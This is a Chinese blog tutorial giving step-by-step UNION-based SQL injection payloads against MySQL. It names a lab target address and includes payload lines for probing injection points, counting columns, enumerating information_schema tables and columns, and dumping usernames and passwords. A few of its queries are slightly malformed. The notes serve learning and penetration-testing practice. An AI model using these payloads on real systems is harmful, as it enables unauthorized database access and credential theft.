SQL注入(一)之union注入

已于 2022-10-21 11:10:38 修改
阅读量2.9k 收藏 17
点赞数 4
分类专栏: 网络安全 web渗透 SQL注入 文章标签: SQL注入 安全 渗透 web安全
于 2020-07-08 14:00:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42545755/article/details/107204043
版权

SQL注入(一)之union注入

靶机地址:http://59.53.63.23:10772/
在SQL注入的前期,第一件事情就是找到SQL注入点,在找到注入点后开始下面的内容:

一、联合查询法(一)

a.判断注入点:
and 1=1  --返回true,显示正常
and 1=2  --返回false,显示错误
b.猜多少列
order by [数值]
c.联合查询猜表名
union select 1,2,3,……,7 from users --猜表名并记录返回回显位(报错说明表不存在,将表名更换继续猜)
d.联合查询猜列名
union select 1,2,username,4,5,password,7 --猜列名

二、联合查询法(二)

在MySQL5.0之后,MySQL会默认在数据库中存放一个"information_schema"的数据库,所有数据库及他们的表都会存放在"information_schema"这个数据库中,我们需要记住:SCHEMATA、TABLES和COLUMNS这三个表名。

1.SCHEMATA这个表中我们需要记住字段:SCHEMA_NAME,它存储了该用户创建的所有数据库库名;

在这里插入图片描述

2.TABLES这个表中我们需要记住字段:TABLE_SCHEMA(数据库库名)、TABLE_NAME(表名),它存储了该用户创建的所有数据库库名和表名;

在这里插入图片描述

3.COLUMNS表中我们需要记住字段:TABLE_SCHEMA(库名)、TABLE_NAME(表名)、COLUMN_NAME(字段名),它存储了该用户创建的所有数据库库名、表名和字段名。

在这里插入图片描述

information_schema.tables 记录表名信息
information_schema.columns 记录列名信息
TABLE_SCHEMA 数据库字段
table_name 表名 column_name 列名

需要记住的三个函数:
database():当前网站使用的数据库
version():当前mysql的版本
user():当前mysql的用户
a.获取数据库库名、版本号、用户
union select 1,2,database(),version(),user(),6,7
b.得到数据库库名后查当前数据库表名
union select table_name from information_schema.tables where table_schema=database();
c.在查到的表名中查找列名,假设需要的表名为:user
union select  column_name from information_schema.columns where table_name='users';
e.查数据,假设查到的列名分别为:id,username,password
union select username,password from table_name='user';
注:笔记仅供学习交流,请勿用于违法行为,如造成后果,与笔者无关

本人小白一枚,如果各位老哥发现错误,还望指出

更多需要请关注:笔者小站:https://www.my404.cn/
笔者微信公众号:安服仔的救赎

关注微信公众号

木尤
关注
  • 4
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入讲解ppt.pptx
08-10
一、SQL 注入的特点: 1. 广泛性:SQL 注入可以发生在各种 web 应用程序中,无论是使用哪种编程语言或数据库管理系统。 2. 隐蔽性:SQL 注入攻击往往是隐蔽的,很难被发现,需要具备专业的安全知识和经验来检测和...
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入union联合注入
m0_63436163的博客
01-30 903
联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
SQL注入union 联合注入
weixin_53711701的博客
01-16 4406
SQL注入union联合注入
SQL注入学习之union联合查询注入
LTNSLALALA的博客
06-13 4317
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL注入-03】union联合查询注入案例
m0_64378913的博客
04-25 3363
目录1 union联合查询注入概述1.1 简介1.2 适用条件1.3 注入步骤1.4 注入技巧2 union联合查询注入案例2.1 操作环境2.2 操作具体步骤2.2.1 判断是否存在注入点及注入的类型2.2.2 使用ORDER BY 查询回显列数。2.2.3 判断显示位置2.2.4 获取数据库名2.2.5 获取数据库中的所有表名2.2.6 获取数据库的对应表中的所有字段名2.2.7 获取字段中的数据3 总结 本博客内容仅供学习探讨,请勿滥用乱用 1 union联合查询注入概述 1.1 简介 union
sql注入(Union注入攻击)
m0_65463546的博客
12-08 1251
这段时间自我摸索着学习了下sql注入,学习的过程中发现了一些小白学习初期可能会犯的错误,也想把自己学习过程中的心得与体会分享给大家,希望能帮助到大家!好了,接下来就开始我们的正题!在数据库中,当我们需要将两个表的查询内容合并到一张表去显示,就需要使用我们的Union去拼接。例如:select 字段1,字段2,字段3 from为什么会报错?即两表查询字段数量不一致。
SQL注入union联合注入
hobby云说
06-12 3599
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
SQL注入02】union联合查询注入实例操作
Fighting_hawk的博客
02-18 4060
1. 掌握union联合查询注入的流程; 2. 理解union联合查询的限制条件; 3. 查询语句中尽可能减少字符串的使用,可以转为使用SQL内置函数或转为16进制码。
sql注入之select/union select
@一只躺平的猪@的博客
07-14 3003
select :select 1 from table、 select count(1) from table、select sum(1) from table union select:union语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
分享一个简单的sql注入
12-16
SQL注入是一种常见的网络安全威胁,它主要针对使用SQL(结构化查询语言)的数据库系统。攻击者通过在网页表单、URL参数或其他用户输入点输入恶意的SQL代码,以欺骗服务器执行非授权的操作,从而获取敏感信息、篡改...
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
sql注入之手工注入示例详解
09-10
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的参数直接构造SQL查询语句时。手工注入是指不依赖自动化工具,而是通过手动构造和尝试不同的SQL语句来探测和利用这种漏洞。本文将深入讲解如何进行...
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 730
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1050
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
kechengsheji2021.zip
07-30
kechengsheji2021.zip
1cfa8b474c28bb76433ab12fc99ee5ad.jpeg
最新发布
07-30
1cfa8b474c28bb76433ab12fc99ee5ad.jpeg
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

木尤

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值